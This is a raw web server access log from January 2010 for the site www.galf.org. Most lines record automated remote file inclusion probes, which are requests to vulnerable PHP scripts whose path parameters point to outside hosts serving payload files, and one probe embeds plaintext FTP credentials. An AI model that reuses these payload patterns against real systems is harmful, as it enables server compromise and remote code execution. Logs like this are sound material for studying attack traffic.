121.101.214.54 - - [24/Jan/2010:20:55:31 -0800] "GET /logs/access.log%20%20////bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:20:56:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:20:56:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:20:56:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:20:56:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:57:05 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [24/Jan/2010:21:00:10 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:03 -0800] "GET /logs////board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:03 -0800] "GET /logs/access.log%20%20////board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:03 -0800] "GET ///board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [24/Jan/2010:21:06:41 -0800] "GET /logs/access_090928.log////?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:21:06:41 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:21:06:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:51 -0800] "GET //bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:58 -0800] "GET /logs/access.log///bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:06:58 -0800] "GET /logs///bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.23 - - [24/Jan/2010:21:09:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.23 - - [24/Jan/2010:21:13:12 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:21:15:04 -0800] "GET /formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:21:15:05 -0800] "GET /logs//formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:21:15:05 -0800] "GET /logs/access_090713.log%20%20//formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:21:15:44 -0800] "GET /logs/access_090713.log//formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [24/Jan/2010:21:18:51 -0800] "GET /logs/access_091102.log HTTP/1.0" 200 8742263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /logs/access.log//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /logs/access.log//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:20:26 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:09 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:09 -0800] "GET /logs/access.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:09 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:10 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:10 -0800] "GET /logs/access.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.125.44.136 - - [24/Jan/2010:21:21:10 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
180.68.206.20 - - [24/Jan/2010:21:23:31 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:32 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:32 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:21:23:32 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:21:23:32 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:33 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:43 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:44 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:23:44 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:27 -0800] "GET /logs/access_091026.log//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:27 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:28 -0800] "GET /logs/access_091026.log//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:28 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:28 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:21:24:30 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:26:42 -0800] "GET ///twindow_notice.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:26:42 -0800] "GET /logs/access_091207.log%20%20////twindow_notice.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:26:42 -0800] "GET /logs////twindow_notice.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:28:00 -0800] "GET /logs/access_090831.log%20%20////twindow_notice.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:21:30:50 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:21:30:50 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:21:30:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [24/Jan/2010:21:33:29 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 6411322 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:21:38:11 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:21:38:11 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:40:28 -0800] "GET /logs/access_090921.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:40:28 -0800] "GET /logs/access_091109.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:40:28 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:40:28 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [24/Jan/2010:21:43:14 -0800] "GET /logs//delete.php?board_skin_path=http://developdesign.com/amik/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.199.140.158 - - [24/Jan/2010:21:43:14 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://developdesign.com/amik/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.199.140.158 - - [24/Jan/2010:21:43:25 -0800] "GET /delete.php?board_skin_path=http://developdesign.com/amik/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:21:45:31 -0800] "GET //bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:45:41 -0800] "GET /logs/access.log%20%20///bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:21:45:41 -0800] "GET /logs///bbs/skin/daerew_45galleryGD//setup.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:21:46:57 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:21:46:57 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:51:58 -0800] "GET /logs/access_091116.log//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:51:58 -0800] "GET /logs//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:51:58 -0800] "GET /bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:21:52:23 -0800] "GET /logs/access_091109.log//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:55:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:55:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:55:46 -0800] "GET /logs/access_090720.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:56:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:56:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:56:01 -0800] "GET /logs/access_090720.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.56 - - [24/Jan/2010:21:56:06 -0800] "GET /logs/access.log%20///delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.38.12.56 - - [24/Jan/2010:21:56:06 -0800] "GET /logs///delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.38.12.56 - - [24/Jan/2010:21:56:06 -0800] "GET //delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
210.127.253.75 - - [24/Jan/2010:21:57:04 -0800] "GET //delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "galf.org"
210.127.253.75 - - [24/Jan/2010:21:57:04 -0800] "GET /logs///delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "galf.org"
210.127.253.75 - - [24/Jan/2010:21:57:05 -0800] "GET /logs/access.log%20///delete_all.php?board_skin_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "galf.org"
200.93.147.154 - - [24/Jan/2010:21:57:05 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:57:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [24/Jan/2010:21:57:05 -0800] "GET /logs/access_090720.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:01 -0800] "GET /logs//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:01 -0800] "GET /include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:01 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:27 -0800] "GET /logs//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:27 -0800] "GET /include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:27 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:21:59:52 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:22:00:18 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:00:55 -0800] "GET /logs/access_090824.log///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:00:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:00:55 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:01:04 -0800] "GET /logs/access_090824.log///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:01:04 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [24/Jan/2010:22:01:04 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:07:46 -0800] "GET /logs/access_100104.log%20%20/?_zb_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:07:46 -0800] "GET /logs/?_zb_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:07:46 -0800] "GET /?_zb_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:22:12:13 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:22:12:13 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:22:12:34 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
